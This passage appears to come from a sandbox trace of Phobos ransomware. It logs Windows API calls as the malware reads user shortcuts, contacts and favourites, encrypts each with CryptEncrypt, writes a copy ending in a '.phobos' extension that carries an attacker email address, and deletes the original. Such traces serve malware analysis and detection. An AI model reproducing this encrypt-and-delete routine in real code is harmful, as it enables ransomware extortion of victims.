(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.636] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.636] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.636] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4cc, lpOverlapped=0x0) returned 1 [0211.669] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4d0, dwBufLen=0x4d0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4d0) returned 1 [0211.669] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4d0, lpOverlapped=0x0) returned 1 [0211.670] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.670] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.670] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0211.670] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.670] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0211.670] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.670] CloseHandle (hObject=0x10c) returned 1 [0211.670] CloseHandle (hObject=0x178) returned 1 [0211.671] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk")) returned 1 [0211.672] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.672] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1449) returned 1 [0211.672] CloseHandle (hObject=0x178) returned 1 [0211.672] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk")) returned 0x20 [0211.672] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.673] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.673] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.673] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.673] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.673] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x5a9, lpOverlapped=0x0) returned 1 [0211.763] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5b0) returned 1 [0211.763] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x5b0, lpOverlapped=0x0) returned 1 [0211.763] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0211.763] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.763] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0211.763] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.764] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0211.764] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.764] CloseHandle (hObject=0x178) returned 1 [0211.764] CloseHandle (hObject=0x10c) returned 1 [0211.764] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk")) returned 1 [0211.765] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.766] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=68382) returned 1 [0211.766] CloseHandle (hObject=0x10c) returned 1 [0211.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact")) returned 0x20 [0211.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\contacts\\administrator.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.766] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.766] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\contacts\\administrator.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.813] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.813] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.813] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x10b1e, lpOverlapped=0x0) returned 1 [0211.891] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10b20, dwBufLen=0x10b20 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10b20) returned 1 [0211.891] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10b20, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10b20, lpOverlapped=0x0) returned 1 [0211.893] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0211.893] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.893] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0211.893] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.893] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0211.893] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.893] CloseHandle (hObject=0x10c) returned 1 [0211.893] CloseHandle (hObject=0x178) returned 1 [0211.894] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact")) returned 1 [0211.895] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.896] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0211.896] CloseHandle (hObject=0x178) returned 1 [0211.896] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url")) returned 0x20 [0211.896] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.896] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.896] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.897] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.897] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.897] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0211.898] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0211.898] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0211.898] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0211.898] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.898] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0211.898] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.898] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0211.899] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.899] CloseHandle (hObject=0x178) returned 1 [0211.899] CloseHandle (hObject=0x10c) returned 1 [0211.899] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url")) returned 1 [0211.900] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.900] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0211.900] CloseHandle (hObject=0x10c) returned 1 [0211.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url")) returned 0x20 [0211.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.901] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.901] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.901] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.901] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.901] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0211.902] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0211.902] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0211.903] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0211.903] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.903] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0211.903] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.903] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0211.903] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.903] CloseHandle (hObject=0x10c) returned 1 [0211.904] CloseHandle (hObject=0x178) returned 1 [0211.904] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url")) returned 1 [0211.904] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.905] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0211.905] CloseHandle (hObject=0x178) returned 1 [0211.905] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url")) returned 0x20 [0211.905] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.905] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.905] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.906] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.906] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.906] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0211.907] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0211.907] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0211.908] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0211.908] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.908] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0211.908] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.908] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0211.908] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.908] CloseHandle (hObject=0x178) returned 1 [0211.908] CloseHandle (hObject=0x10c) returned 1 [0211.908] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url")) returned 1 [0211.909] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.909] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: 